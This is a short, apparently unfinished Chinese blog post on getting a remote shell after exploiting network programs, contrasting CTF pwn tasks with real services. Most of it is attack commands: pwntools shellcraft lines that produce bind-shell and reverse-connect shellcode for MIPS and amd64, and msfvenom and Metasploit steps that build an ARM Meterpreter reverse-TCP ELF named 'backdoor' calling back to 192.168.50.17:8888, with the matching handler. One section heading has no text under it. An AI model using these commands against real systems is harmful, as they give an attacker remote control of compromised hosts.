Getshell远程:真·RCE 正连?反连?不连?

更新中…真实的网络程序和Pwn题目中把输入输出映射到网络端口,二者程序本体的交互接口显然是不同的,后一种的CTF题目,真的具有现实意义么?如果是真的网络程序,我控制流劫持后直接执行system(“/bin/sh”)可以拿到shell么?如果不能,我如何才能Getshell呢?

在进入正题前,我们先说点别的。

shellcode级别

shellcraft.mips.linux.bindsh(9999)
shellcraft.mips.linux.connect('192.168.1.100',9999)+shellcraft.mips.linux.dupsh()
shellcraft.amd64.linux.bindsh(9999)
shellcraft.amd64.linux.connect('192.168.1.100',9999)+shellcraft.amd64.linux.dupsh()

命令执行级别

文件级别

➜  msfvenom --list payloads | grep linux | grep meterpreter_reverse_tcp                                                            
    linux/aarch64/meterpreter_reverse_tcp               Run the Meterpreter / Mettle server payload (stageless)
    linux/armbe/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
    linux/armle/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
    linux/mips64/meterpreter_reverse_tcp                Run the Meterpreter / Mettle server payload (stageless)
    linux/mipsbe/meterpreter_reverse_tcp                Run the Meterpreter / Mettle server payload (stageless)
    linux/mipsle/meterpreter_reverse_tcp                Run the Meterpreter / Mettle server payload (stageless)
    linux/ppc/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/ppc64le/meterpreter_reverse_tcp               Run the Meterpreter / Mettle server payload (stageless)
    linux/ppce500v2/meterpreter_reverse_tcp             Run the Meterpreter / Mettle server payload (stageless)
    linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x86/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/zarch/meterpreter_reverse_tcp                 Run the Meterpreter / Mettle server payload (stageless)
➜  msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.50.17 LPORT=8888 -f elf -o backdoor
msf5 > use exploit/multi/handler
msf5 > set payload linux/armle/meterpreter/reverse_tcp
msf5 > set LPORT 8888
msf5 > set LHOST 0.0.0.0
msf5 > run